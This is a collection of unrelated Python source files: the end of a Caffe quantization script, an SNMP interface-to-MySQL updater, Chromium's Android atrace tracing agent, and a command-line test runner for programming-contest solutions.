# write_to_prototxt(net_proto_BAC, './temp.prototxt')
# ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
# print '\t{}bit:\t\t{}'.format(bw,ap)
# if ap < (full_ap - args.error_margin):
# bw_l = bw
# else:
# bw_h = bw
# bw_multiplier = bw
# if bw_h - bw_l <=1:
# break
# bw = bw_l + (bw_h-bw_l)/2
print 'Analyzing layer adder'
print '\tbit width\t accuracy'
i = bw_output
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_adder(net_proto_BAC, net_adder_IL, i, adderIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i)+'-32',
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_adder(net_proto_BAC, net_adder_IL, i+1, adderIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i+1)+'-32',
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-'+str(j)+'-32'],timer.total_time)
for j in range(i, i+2):
if shared_dict['32-32-32-'+str(j)+'-32'] > (layer_ap - 0.005):
bw_adder = j
not_found = False
break;
i = i + 2
#bw_h = 16
#bw_l = 0
#bw = 16
#print 'Analyzing layer adder'
#print '\tbit width\t accuracy'
#while True:
# net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
# quantize_net_adder(net_BAC, net_proto_BAC, net_adder_IL, bw)
# write_to_prototxt(net_proto_BAC, './temp.prototxt')
# ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
# print '\t{}bit:\t\t{}'.format(bw,ap)
# if ap < (full_ap - args.error_margin):
# bw_l = bw
# else:
# bw_h = bw
# bw_adder = bw
# if bw_h - bw_l <=1:
# break
# bw = bw_l + (bw_h-bw_l)/2
print 'Create Final Bit-Accurate quantized prototxt'
convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
net_proto_final = read_from_prototxt(args.prototxt_quantized_BAC)
print 'Loading Final Bit-Accurate quantized prototxt'
quantize_net_multiplier(net_proto_final, net_multiplier_IL, bw_multiplier, multIL_reduction)
quantize_net_adder(net_proto_final, net_adder_IL, bw_adder, adderIL_reduction)
write_to_prototxt(net_proto_final, './temp_f.prototxt')
p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-DQ-DQ', './temp_f.prototxt',
shared_dict,GPU1))
p.start()
p.join()
ap = shared_dict['DQ-DQ-DQ-DQ-DQ']
#ap = test_qnet('./temp_f.prototxt', args.caffemodel, imdb)
print '----------------------------------------'
print '{}bit adder, {}bit multiplier,'.format(bw_adder, bw_multiplier)
print 'Accuracy {}'.format(ap)
print 'Dynamic fixed point net:'
print '{}bit CONV and DECONV weights'.format(bw_conv)
print '{}bit FC weights'.format(bw_fc)
print '{}bit layer activations'.format(bw_output)
print '{}bit adder'.format(bw_adder)
print '{}bit multiplier'.format(bw_multiplier)
print 'Please fine-tune'
write_to_prototxt(net_proto_final, args.prototxt_quantized_BAC)
print 'Bit-Accurate Quantized Model saved to', args.prototxt_quantized_BAC
|
regular_interface_update.py | from common_tasks import Grab_device_interfaces_snmp, get_data, set_data_mysql
from SNMPPoll import SnmpPoll as snmppoll
from Classes import ToolLog
def Device_interfaces_update():
"""
Author - Jonathan Steward
Function - Workflow function
Inputs - n/a
returns -
int - updates - the number of interface records updated
int - adds - The number of interface records added
"""
command = "SELECT * FROM `FYP Data`.device_table;"
devices = get_data(command)
updates = 0
adds = 0
unreachable = 0
for device in devices:
updates, adds, unreachable = process_interfaces(device, updates, adds, unreachable)
return updates, adds, unreachable
"""
# uncomment below to enable threading
for device in devices:
t = Thread(target=Device_grab_interfaces, args=(device,))
t.start()
"""
def process_interfaces(device, updates, adds, unreachable):
"""
Author - Jonathan Steward
Function - Function to carry out the logic to detect new or update interfaces and add to DB
Inputs -
Device - touple - one data record from the database containing device details
updates - int - Number of updates so far
adds - int - Number of added interfaces so far
returns -
int - updates - the number of interface records updated
int - adds - The number of interface records added
"""
print "grabbing details for:\n{}".format(device)
(device_id, device_ip, vendor,
community, username, passwd,
enpass, config_lock, lock_reason, asn) = device
device_interfaces = grab_device_interfaces(device_ip, community)
if not device_interfaces:
unreachable += 1
return updates, adds, unreachable
command = "SELECT * FROM `FYP Data`.interfaces where device_id = {}".format(device_id)
db_interfaces = get_data(command)
# db_interfaces will be ID/device_id/name/description/ip_address/state/lastupdate/traffic_counter/speed
for ifindex, device_int in device_interfaces.items():
# Checking new device interface
state = "new"
for interface in db_interfaces:
# finding matching database interface
if device_int["name"] == interface[2]:
# Check state
if device_int["description"] != interface[3]:
state = "update"
updates += 1
command = update_command(device_int, interface)
print "need to update record"
break
if device_int["speed"] != interface[8]:
state = "update"
updates += 1
command = update_command(device_int, interface)
print "need to update record"
break
if device_int["ip"] != interface[4]:
state = "update"
updates += 1
command = update_command(device_int, interface)
print "need to update record"
break
if device_int["state"] != interface[5]:
state = "update"
updates += 1
command = update_command(device_int, interface)
print "need to update record"
break
state = "good"
# print "interface details the same as the database."
break
else:
continue
# itterated through all db interfaces
if state == "new":
adds += 1
print "A new interface was detected: {}".format(device_int["name"])
command = add_command(device_int, device_id)
return updates, adds, unreachable
def grab_device_interfaces(device_ip, community):
"""
Author - Jonathan Steward
Function - Grab details for device interfaces along with stats and set all information into one dictionary
Inputs -
device_ip - string - ip address of device
community - string - community details for snmp
returns -
dictionary - device_interfaces - keyed based on oid interface.
"""
device_interfaces = {}
interface_name_results = Grab_device_interfaces_snmp(device_ip, community)
if not interface_name_results:
return
interface_descriptions = snmppoll("WALK", ".1.3.6.1.2.1.31.1.1.1.18", device_ip, community)
if not interface_descriptions:
return
interface_ip = snmppoll("WALK", ".1.3.6.1.2.1.4.20.1.2", device_ip, community)
if not interface_ip:
return
interface_state = snmppoll("WALK", ".1.3.6.1.2.1.2.2.1.8", device_ip, community)
if not interface_state:
return
interface_speed = snmppoll("WALK", ".1.3.6.1.2.1.2.2.1.5", device_ip, community)
if not interface_speed:
return
for inter in interface_name_results:
device_interfaces[inter.oid_index] = {
"name": inter.value,
"description": "",
"ip": "",
"state": ""
}
for desc in interface_descriptions:
if desc.oid_index == inter.oid_index:
device_interfaces[inter.oid_index]["description"] = desc.value
break
for ip in interface_ip:
if ip.value == inter.oid_index:
device_interfaces[inter.oid_index]["ip"] = ip.oid_index
break
for speed in interface_speed:
if speed.oid_index == inter.oid_index:
device_interfaces[inter.oid_index]["speed"] = int(speed.value)
break
for state in interface_state:
if state.oid_index == inter.oid_index:
if state.value == "1":
state.value = "up"
else:
state.value = "down"
device_interfaces[inter.oid_index]["state"] = state.value
break
return device_interfaces
def update_command(device_int, db_int):
"""
Author - Jonathan Steward
Function - updating database with new interface state
Inputs -
device_int - dictionary - details of the interface for the state update
db_int - list - details of the interface from the db, used for the id of the int record
returns - n/a
"""
command = """
UPDATE `FYP Data`.`interfaces`
SET `description`='{}', `ip_address`='{}', `state`='{}', `speed` ="{}"
WHERE `interface_id`='{}';""".format(
device_int["description"],
device_int["ip"],
device_int["state"],
device_int["speed"],
db_int[0])
set_data_mysql(command)
def add_command(device_int, device_id):
"""
Author - Jonathan Steward
Function - Adds a new interface into the DB
Inputs -
device_int - dictionary - details of the interface for the state update
device_id - int - device_id of the related device for linking in the DB
returns - n/a
"""
command = """
INSERT INTO `FYP Data`.`interfaces`
(`device_id`,`name`,`description`,`ip_address`,`state`, `speed`)
VALUES('{}','{}','{}','{}','{}', '{}');""".format(
device_id,
device_int["name"],
device_int["description"],
device_int["ip"],
device_int["state"],
device_int["speed"])
set_data_mysql(command)
def main():
toollog = ToolLog("update global interfaces", "")
updates, adds, unreachable = Device_interfaces_update()
toollog.set_tool_log(True, "Updated: {} Added: {} Unreachable: {}".format(updates, adds, unreachable))
if __name__ == "__main__":
main()
|
atrace_agent.py | # Copyright (c) 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
import py_utils
import subprocess
import sys
import threading
import zlib
from devil.android import device_utils
from py_trace_event import trace_time
from systrace import tracing_agents
from systrace import util
# Text that ADB sends, but does not need to be displayed to the user.
ADB_IGNORE_REGEXP = r'^capturing trace\.\.\. done|^capturing trace\.\.\.'
# The number of seconds to wait on output from ADB.
ADB_STDOUT_READ_TIMEOUT = 0.2
# The adb shell command to initiate a trace.
ATRACE_BASE_ARGS = ['atrace']
# If a custom list of categories is not specified, traces will include
# these categories (if available on the device).
DEFAULT_CATEGORIES = 'sched gfx view dalvik webview input disk am wm'.split()
# The command to list trace categories.
LIST_CATEGORIES_ARGS = ATRACE_BASE_ARGS + ['--list_categories']
# Minimum number of seconds between displaying status updates.
MIN_TIME_BETWEEN_STATUS_UPDATES = 0.2
# ADB sends this text to indicate the beginning of the trace data.
TRACE_START_REGEXP = r'TRACE\:'
# Plain-text trace data should always start with this string.
TRACE_TEXT_HEADER = '# tracer'
# The property name for switching on and off tracing during boot.
BOOTTRACE_PROP = 'persist.debug.atrace.boottrace'
# The file path for specifying categories to be traced during boot.
BOOTTRACE_CATEGORIES = '/data/misc/boottrace/categories'
def list_categories(options):
"""List the possible trace event categories.
This function needs the tracing options since it needs to get the serial
number of the device to send a command to.
Args:
options: Tracing options.
"""
devutils = device_utils.DeviceUtils(options.device_serial_number)
print '\n'.join(devutils.RunShellCommand(LIST_CATEGORIES_ARGS))
def get_available_categories(options):
"""Gets the list of atrace categories available for tracing.
Args:
options: Tracing options.
"""
devutils = device_utils.DeviceUtils(options.device_serial_number)
categories_output = devutils.RunShellCommand(LIST_CATEGORIES_ARGS)
return [c.split('-')[0].strip() for c in categories_output]
def try_create_agent(options):
"""Create an Atrace agent.
Args:
options: Command line options.
categories: Categories of trace events to capture.
"""
if options.target != 'android':
return False
if options.from_file is not None:
return False
# Check device SDK version.
device_sdk_version = util.get_device_sdk_version()
if device_sdk_version <= 17:
print ('Device SDK versions <= 17 not supported.\n'
'Your device SDK version is %d.' % device_sdk_version)
return False
if device_sdk_version <= 22 and options.boot:
print ('--boot option does not work on the device SDK '
'version 22 or before.\nYour device SDK version '
'is %d.' % device_sdk_version)
return False
return BootAgent() if options.boot else AtraceAgent()
def _construct_extra_atrace_args(options, categories):
"""Construct extra arguments (-a, -k, categories) for atrace command.
Args:
options: Tracing options.
categories: Categories of trace events to capture.
"""
extra_args = []
if options.app_name is not None:
extra_args.extend(['-a', options.app_name])
if options.kfuncs is not None:
extra_args.extend(['-k', options.kfuncs])
extra_args.extend(categories)
return extra_args
def _construct_atrace_args(options, categories):
"""Builds the command used to invoke a trace process.
Returns:
A tuple where the first element is an array of command arguments, and
the second element is a boolean which will be true if the command will
stream trace data.
"""
atrace_args = ATRACE_BASE_ARGS[:]
if options.compress_trace_data:
atrace_args.extend(['-z'])
if (options.trace_time is not None) and (options.trace_time > 0):
atrace_args.extend(['-t', str(options.trace_time)])
if (options.trace_buf_size is not None) and (options.trace_buf_size > 0):
atrace_args.extend(['-b', str(options.trace_buf_size)])
elif 'sched' in categories:
# 'sched' is a high-volume tag, double the default buffer size
# to accommodate that
atrace_args.extend(['-b', '4096'])
extra_args = _construct_extra_atrace_args(options, categories)
atrace_args.extend(extra_args)
return atrace_args
class AtraceAgent(tracing_agents.TracingAgent):
def __init__(self):
super(AtraceAgent, self).__init__()
self._adb = None
self._trace_data = None
self._tracer_args = None
self._collection_thread = None
self._device_utils = None
self._device_serial_number = None
self._options = None
self._categories = None
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StartAgentTracing(self, options, categories, timeout=None):
self._options = options
self._categories = categories
if not self._categories:
self._categories = DEFAULT_CATEGORIES
avail_cats = get_available_categories(options)
unavailable = [x for x in self._categories if x not in avail_cats]
self._categories = [x for x in self._categories if x in avail_cats]
if unavailable:
print 'These categories are unavailable: ' + ' '.join(unavailable)
self._device_utils = device_utils.DeviceUtils(options.device_serial_number)
self._device_serial_number = options.device_serial_number
self._tracer_args = _construct_atrace_args(options, self._categories)
self._device_utils.RunShellCommand(self._tracer_args + ['--async_start'])
return True
def _collect_and_preprocess(self):
"""Collects and preprocesses trace data.
Stores results in self._trace_data.
"""
trace_data = self._collect_trace_data()
self._trace_data = self._preprocess_trace_data(trace_data)
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StopAgentTracing(self, timeout=None):
"""Stops tracing and starts collecting results.
To synchronously retrieve the results after calling this function,
call GetResults().
"""
self._collection_thread = threading.Thread(
target=self._collect_and_preprocess)
self._collection_thread.start()
return True
@py_utils.Timeout(tracing_agents.GET_RESULTS_TIMEOUT)
def GetResults(self, timeout=None):
"""Waits for collection thread to finish and returns trace results."""
self._collection_thread.join()
self._collection_thread = None
return tracing_agents.TraceResult('systemTraceEvents', self._trace_data)
def SupportsExplicitClockSync(self):
return True
def RecordClockSyncMarker(self, sync_id, did_record_sync_marker_callback):
"""Records a clock sync marker.
Args:
sync_id: ID string for clock sync marker.
"""
cmd = 'echo name=%s > /sys/kernel/debug/tracing/trace_marker' % sync_id
with self._device_utils.adb.PersistentShell(
self._device_serial_number) as shell:
t1 = trace_time.Now()
shell.RunCommand(cmd, close=True)
did_record_sync_marker_callback(t1, sync_id)
def _dump_trace(self):
"""Dumps the atrace buffer and returns the dumped buffer."""
dump_cmd = self._tracer_args + ['--async_dump']
return self._device_utils.RunShellCommand(dump_cmd, raw_output=True)
def _stop_trace(self):
"""Stops atrace.
Tries to stop the atrace asynchronously. Note that on some devices,
--async-stop does not work. Thus, this uses the fallback
method of running a zero-length synchronous trace if that fails.
"""
self._device_utils.RunShellCommand(self._tracer_args + ['--async_stop'])
is_trace_enabled_cmd = ['cat', '/sys/kernel/debug/tracing/tracing_on']
trace_on = int(self._device_utils.RunShellCommand(is_trace_enabled_cmd)[0])
if trace_on:
self._device_utils.RunShellCommand(self._tracer_args + ['-t 0'])
def _collect_trace_data(self):
"""Reads the output from atrace and stops the trace."""
result = self._dump_trace()
data_start = re.search(TRACE_START_REGEXP, result)
if data_start:
data_start = data_start.end(0)
else:
raise IOError('Unable to get atrace data. Did you forget adb root?')
output = re.sub(ADB_IGNORE_REGEXP, '', result[data_start:])
self._stop_trace()
return output
def _preprocess_trace_data(self, trace_data):
"""Performs various processing on atrace data.
Args:
trace_data: The raw trace data.
Returns:
The processed trace data.
"""
if trace_data:
trace_data = strip_and_decompress_trace(trace_data)
if not trace_data:
print >> sys.stderr, ('No data was captured. Output file was not '
'written.')
sys.exit(1)
if self._options.fix_threads:
# Issue ps command to device and patch thread names
ps_dump = do_preprocess_adb_cmd('ps -t',
self._options.device_serial_number)
if ps_dump is not None:
thread_names = extract_thread_list(ps_dump)
trace_data = fix_thread_names(trace_data, thread_names)
if self._options.fix_tgids:
# Issue printf command to device and patch tgids
procfs_dump = do_preprocess_adb_cmd('printf "%s\n" ' +
'/proc/[0-9]*/task/[0-9]*',
self._options.device_serial_number)
if procfs_dump is not None:
pid2_tgid = extract_tgids(procfs_dump)
trace_data = fix_missing_tgids(trace_data, pid2_tgid)
if self._options.fix_circular:
trace_data = fix_circular_traces(trace_data)
return trace_data
class BootAgent(AtraceAgent):
"""AtraceAgent that specializes in tracing the boot sequence."""
def __init__(self):
super(BootAgent, self).__init__()
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StartAgentTracing(self, options, categories, timeout=None):
self._options = options
try:
setup_args = _construct_boot_setup_command(options, categories)
subprocess.check_call(setup_args)
except OSError as error:
print >> sys.stderr, (
'The command "%s" failed with the following error:' %
' '.join(setup_args))
print >> sys.stderr, ' ', error
sys.exit(1)
def _dump_trace(self): #called by StopAgentTracing
"""Dumps the running trace asynchronously and returns the dumped trace."""
dump_cmd = _construct_boot_trace_command(self._options)
return self._device_utils.RunShellCommand(dump_cmd, raw_output=True)
def _stop_trace(self): # called by _collect_trace_data via StopAgentTracing
# pylint: disable=no-self-use
# This is a member function for consistency with AtraceAgent
pass # don't need to stop separately; already done in dump_trace
def _construct_boot_setup_command(options, categories):
echo_args = ['echo'] + categories + ['>', BOOTTRACE_CATEGORIES]
setprop_args = ['setprop', BOOTTRACE_PROP, '1']
reboot_args = ['reboot']
return util.construct_adb_shell_command(
echo_args + ['&&'] + setprop_args + ['&&'] + reboot_args,
options.device_serial_number)
def _construct_boot_trace_command(options):
atrace_args = ['atrace', '--async_stop']
setprop_args = ['setprop', BOOTTRACE_PROP, '0']
rm_args = ['rm', BOOTTRACE_CATEGORIES]
return util.construct_adb_shell_command(
atrace_args + ['&&'] + setprop_args + ['&&'] + rm_args,
options.device_serial_number)
def extract_thread_list(trace_text):
"""Removes the thread list from the given trace data.
Args:
trace_text: The text portion of the trace
Returns:
a map of thread ids to thread names
"""
threads = {}
# start at line 1 to skip the top of the ps dump:
text = trace_text.splitlines()
for line in text[1:]:
cols = line.split(None, 8)
if len(cols) == 9:
tid = int(cols[1])
name = cols[8]
threads[tid] = name
return threads
def extract_tgids(trace_text):
"""Removes the procfs dump from the given trace text
Args:
trace_text: The text portion of the trace
Returns:
a map of pids to their tgid.
"""
tgid_2pid = {}
text = trace_text.splitlines()
for line in text:
result = re.match('^/proc/([0-9]+)/task/([0-9]+)', line)
if result:
parent_pid, tgid = result.group(1, 2)
tgid_2pid[tgid] = parent_pid
return tgid_2pid
def strip_and_decompress_trace(trace_data):
"""Fixes new-lines and decompresses trace data.
Args:
trace_data: The trace data returned by atrace.
Returns:
The decompressed trace data.
"""
# Collapse CRLFs that are added by adb shell.
if trace_data.startswith('\r\n'):
trace_data = trace_data.replace('\r\n', '\n')
elif trace_data.startswith('\r\r\n'):
# On windows, adb adds an extra '\r' character for each line.
trace_data = trace_data.replace('\r\r\n', '\n')
# Skip the initial newline.
if trace_data[0] == '\n':
trace_data = trace_data[1:]
if not trace_data.startswith(TRACE_TEXT_HEADER):
# No header found, so assume the data is compressed.
trace_data = zlib.decompress(trace_data)
# Enforce Unix line-endings.
trace_data = trace_data.replace('\r', '')
# Skip any initial newlines.
while trace_data and trace_data[0] == '\n':
trace_data = trace_data[1:]
return trace_data
def fix_thread_names(trace_data, thread_names):
"""Replaces thread ids with their names.
Args:
trace_data: The atrace data.
thread_names: A mapping of thread ids to thread names.
Returns:
The updated trace data.
"""
def repl(m):
tid = int(m.group(2))
if tid > 0:
name = thread_names.get(tid)
if name is None:
name = m.group(1)
if name == '<...>':
name = '<' + str(tid) + '>'
thread_names[tid] = name
return name + '-' + m.group(2)
else:
return m.group(0)
# matches something like:
# Binder_2-895, or com.google.android.inputmethod.latin-1078 etc...
trace_data = re.sub(r'^\s*(\S+)-(\d+)', repl, trace_data,
flags=re.MULTILINE)
return trace_data
def fix_missing_tgids(trace_data, pid2_tgid):
"""Replaces missing TGIDs from the trace data with those found in procfs
Args:
trace_data: the atrace data
Returns:
The updated trace data with missing TGIDs replaced with the correct TGID
"""
def repl(m):
tid = m.group(2)
if (int(tid) > 0 and m.group(1) != '<idle>' and m.group(3) == '(-----)'
and tid in pid2_tgid):
# returns Proc_name-PID (TGID)
# Binder_2-381 (-----) becomes Binder_2-381 (128)
return m.group(1) + '-' + m.group(2) + ' ( ' + pid2_tgid[tid] + ')'
return m.group(0)
# matches something like:
# Binder_2-895 (-----)
trace_data = re.sub(r'^\s*(\S+)-(\d+)\s+(\(\S+\))', repl, trace_data,
flags=re.MULTILINE)
return trace_data
def fix_circular_traces(out):
"""Fix inconsistentcies in traces due to circular buffering.
The circular buffers are kept per CPU, so it is not guaranteed that the
beginning of a slice is overwritten before the end. To work around this, we
throw away the prefix of the trace where not all CPUs have events yet.
Args:
out: The data to fix.
Returns:
The updated trace data.
"""
# If any of the CPU's buffers have filled up and
# older events have been dropped, the kernel
# emits markers of the form '##### CPU 2 buffer started ####' on
# the line before the first event in the trace on that CPU.
#
# No such headers are emitted if there were no overflows or the trace
# was captured with non-circular buffers.
buffer_start_re = re.compile(r'^#+ CPU \d+ buffer started', re.MULTILINE)
start_of_full_trace = 0
while True:
result = buffer_start_re.search(out, start_of_full_trace + 1)
if result:
start_of_full_trace = result.start()
else:
break
if start_of_full_trace > 0:
# Need to keep the header intact to make the importer happy.
end_of_header = re.search(r'^[^#]', out, re.MULTILINE).start()
out = out[:end_of_header] + out[start_of_full_trace:]
return out
def do_preprocess_adb_cmd(command, serial):
"""Run an ADB command for preprocessing of output.
Run an ADB command and get the results. This function is used for
running commands relating to preprocessing of output data.
Args:
command: Command to run.
serial: Serial number of device.
"""
args = [command]
dump, ret_code = util.run_adb_shell(args, serial)
if ret_code != 0:
return None
dump = ''.join(dump)
return dump
|
simpleattt.py | #!/usr/bin/env python3
import subprocess
import os.path
import sys
import fnmatch
import filecmp
import argparse
import textwrap
import signal
import tigergui
from multiprocessing import Pool
from multiprocessing import Process
class bcolors :
INFO = '\033[95m'
INFO_LOW = '\033[94m'
SUCCES = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,description=textwrap.dedent(
"Tiger is a command-line tool for input-output tasks.\nOn default it reads the tests from the disk\n\n"
" ___......----:'"":--....(\ \n"
" .-':'\"\": : : : : : :.(1\.`-. \n"
" .'`. `. : : : : : : : : : : .'; \n"
" :-`. : . : : `. : : :. : :`.`. a; \n"
" : ;-. `-.-._. : : : ::. .' `. `., = ; \n"
" :-:.` .-. _-., : : : ::,.'.-' ;-. ,'''\" \n"
" .'.' ;`. .-' `-.: : : : :;.-'.-.' `-' \n"
" :. .'.'.-' .'`-.' -._;..:---'''''._.-/ \n"
" :`--'.' : :' ;`-.; :.`.-'`. \n"
" `''' : : ;`.; :=; `.-'`. \n"
" : '. : ; :-: `._-`. \n"
" `'\"' `. `. `--' '._' \n"
" `'\"' \n"
))
parser.add_argument(
"ShortTaskName",
help="Short Task Name (for example : swo for task Swords) "
"Default setting require : (for Swords) "
"Tests in form swoX.in and swoX.out, binary code in swo or source in swo.cpp"
)
parser.add_argument(
"-gui",
"-graphicaluserinterface",
action="store_true",
help="Open graphical user interface. If this option is used all other options are ignored."
)
binarySourceGroup = parser.add_mutually_exclusive_group() # grupa do binary i sourcecode
binarySourceGroup.add_argument(
"-b",
"--binarycode",
help="Exceptional binary code to run against the common one",
default=""
)
binarySourceGroup.add_argument(
"-s",
"--sourcecode",
help="Exceptional source code to compile and run against the common one",
default=""
)
generateGroup = parser.add_mutually_exclusive_group()
generateGroup.add_argument(
"-g",
"--generate",
action="store_true",
help="Generate and run tests but save only those on which the program failed."
)
generateGroup.add_argument(
"-gs",
"--generateandsave",
action="store_true",
help="Generate, run tests and save all tests."
)
generateGroup.add_argument(
"-tf",
"--testfolder",
help="Change the folder with tests which will be executed",
default=""
)
parser.add_argument(
"-op",
"--otherprefix",
help="Change the default prefix for tests",
default=""
)
checkerGroup = parser.add_mutually_exclusive_group()
checkerGroup.add_argument(
"-c",
"--checker",
help="For tasks, which have several acceptable answers (checker gets the input and the output - joined in one file) "
"This chcecker needs to get the input from stdin and return OK or WA to stdout",
default=""
)
checkerGroup.add_argument(
"-cb",
"--checkerbruteforce",
help="For tasks, which have several acceptable answers (checker gets the input, bruteforceprogram output, the output - joined in one file)\n"
"This chcecker needs to get the input from stdin and return OK or WA to stdout",
default=""
)
parser.add_argument(
"-mt",
"--maxtime",
help="Change the time after the program will be killed",
default="5"
)
args = parser.parse_args()
if(args.gui) :
tigergui.buildGui()
sys.exit()
STN = args.ShortTaskName
checker = ""
#def wykonaj(program,test,maxtime) :
# if __name__ == '__main__' :
# p = Process(target=wykonaj, args=(program,test,maxtime,))
# p.start()
# p.join()
PID=0
def handler(signum, frame) :
#print (bcolors.FAIL + "TimeLimitExceeded - Aborting" + bcolors.ENDC)
#print ("Zabijam ", os.getppid(), " i ", os.getpid())
print(bcolors.INFO + "Za chwilę zabiję te procesy, pamiętaj o zabiciu jeszcze wykonywanego programu." + bcolors.ENDC)
os.system("kill " + str(os.getpid()))
os.system("kill " + str(os.getppid()))
def shell(string,maxextime) :
if __name__ == '__main__' :
signal.signal(signal.SIGALRM, handler)
p = Process(target=os.system, args=(string,))
PID = os.getpid()
#print(PID)
#asystem(string)
signal.alarm(int(maxextime))
p.start()
p.join()
#print("procesid = ", p.pid)
signal.alarm(0)
def wykonaj(program,test,maxtime) : # statusy : WA,OK,RE
if os.path.isfile(".temporary") :
os.remove(".temporary")
if os.path.isfile(".temporary2") :
os.remove(".temporary2")
out = test[:-2] + "out"
#print("test:", test)
#print("out:", out)
if os.path.isfile(out) == False :
print((bcolors.WARNING + "{0:20} "+ ": RE - Can't find the out file" + bcolors.ENDC).format(test))
return "RE"
shell("./" + program + " < " + test + " > " + ".temporary", maxtime)
if os.path.isfile(".temporary") == False:
print(bcolors.FAIL + "Your program ended, but didn't return the answer for : " + test + bcolors.ENDC)
return "RE"
if args.checker != "" :
shell("cat" + test + " > .temporary2; echo >> .temporary2; cat .temporary >> .temporary2",maxtime)
shell("./" + checker + " < .temporary2 > .temporary3",maxtime)
with open('.temporary3', 'r') as f:
first_line = f.readline()
return first_line
elif args.checkerbruteforce != "" :
shell("cat" + test + " > .temporary2; echo >> .temporary2;",maxtime)
shell("cat" + out + " > .temporary2; echo >> .temporary2;",maxtime)
shell("cat .temporary >> .temporary2",maxtime)
shell("./" + checker + " < .temporary2 > .temporary3",maxtime)
with open('.temporary3', 'r') as f:
first_line = f.readline()
return first_line
elif filecmp.cmp(out,".temporary") :
print((bcolors.SUCCES + "{0:20} "+ ": OK" + bcolors.ENDC).format(test))
return "OK"
else :
print((bcolors.FAIL + "{0:20} "+ ": WA" + bcolors.ENDC).format(test))
return "WA"
sourceCodeName = ""
binaryCodeName = ""
if args.binarycode != "" :
binaryCodeName = args.binarycode
else :
binaryCodeName = STN
if os.path.isfile(binaryCodeName) :
print (bcolors.INFO + "Succesfully read the binary file : " + bcolors.INFO_LOW + binaryCodeName + bcolors.ENDC)
else :
print (bcolors.WARNING + "Couldn't find the binary file : " + bcolors.INFO_LOW + binaryCodeName + bcolors.ENDC)
if args.sourcecode != "" :
sourceCodeName = args.sourcecode;
else :
sourceCodeName = STN + ".cpp"
if os.path.exists(sourceCodeName) :
print (bcolors.INFO + "Succsesfully read the source file : " + bcolors.INFO_LOW + sourceCodeName + bcolors.ENDC)
else :
print (bcolors.FAIL + "Couldn't find the source file: " + bcolors.INFO_LOW + sourceCodeName + ", ani nie podano innego " + bcolors.ENDC)
sys.exit()
print (bcolors.INFO + "So let's try to compile your program (C++) : " + bcolors.INFO_LOW + sourceCodeName + bcolors.ENDC)
shell("g++" + " -o " + STN + " " + sourceCodeName +" -O2" + " -Wall" + " -static" + " -std=c++11"+ " -g")
binaryCodeName = STN
if os.path.exists(binaryCodeName) :
print(bcolors.SUCCES + "Compiled succsesfully." + bcolors.ENDC)
else :
print(bcolors.FAIL + "There were some errors during the compilation process." + bcolors.ENDC)
sys.exit()
#print(bcolors.INFO + "Czy chcesz generować testy generatorem(0), czy sprawdzić testy już zapisane na dysku(1) ? (0/1) " + bcolors.ENDC)
#tryb = input()
if(args.generate or args.generateandsave) :
print(bcolors.WARNING + "Ta opcja jescze w pełni nie działa." + bcolors.ENDC)
generator = nazwa_programu + "gen"
zrodlo = nazwa_programu + "zrodlo"
brut = nazwa_programu + "brut"
nr = 1
wa = 0
ac = 0
while True :
shell("cp " + zrodlo + " zrodlo2",10) # poprawić
shell("echo " + str(nr) + " >> " + "zrodlo2",10)
test = nazwa_programu + str(nr) + ".in"
testout = nazwa_programu + str(nr) + ".in"
shell("./" + generator + " < zrodlo2 " + " > " + test, 10);
shell("./" + brut + " < " + test + " > " + testout, 10);
wynik = wykonaj(nazwa_programu,test,args.maxtime)
if(wynik == "OK") :
ac+=1
if(wynik == "WA") :
wa+=1
print("ac:",ac," wa:",wa," nr:", nr)
nr+=1
else :
print (bcolors.INFO + "Reading tests from the disk." + bcolors.ENDC)
ile_testow = 0
testy_z_wa = []
testy_z_re = []
katalog = "."
if args.testfolder != "":
katalog = args.testfolder
#print("katalog=" + katalog);
if not os.path.isdir(katalog) :
print (bcolors.FAIL + "Folder " + katalog + " doesn't exist" + bcolors.ENDC)
sys.exit()
prefix=STN
if args.otherprefix != "" :
prefix = args.otherprefix
for test in os.listdir(katalog) :
if fnmatch.fnmatch(test,prefix +'*.in') :
wynik = wykonaj(binaryCodeName,katalog+"/" + test,args.maxtime)
if wynik == "WA" :
testy_z_wa.append(test)
elif wynik == "RE" :
testy_z_re.append(test)
ile_testow += 1
ile_z_ok = ile_testow - len(testy_z_wa) - len(testy_z_re)
print()
if ile_testow > 0 :
print(bcolors.INFO + "Udało się zrobić ", ile_z_ok, "/" ,ile_testow ," ~ ", ile_z_ok*100//ile_testow, "%", bcolors.ENDC)
if len(testy_z_wa) > 0 :
print(bcolors.FAIL + "WA na testach : ");
print(testy_z_wa)
if len(testy_z_re)>0 :
print(bcolors.WARNING + "RE na testach : ");
print(testy_z_re, bcolors.ENDC)
print(bcolors.INFO + "Ending..." + bcolors.ENDC)
if os.path.isfile(".temporary") :
os.remove(".temporary")
if os.path.isfile(".temporary2") :
os.remove(".temporary2")
if os.path.isfile(".temporary3") :
os.remove(".temporary3")
|
iterators.py | import multiprocessing
import random
import sys
import queue
import threading
import traceback
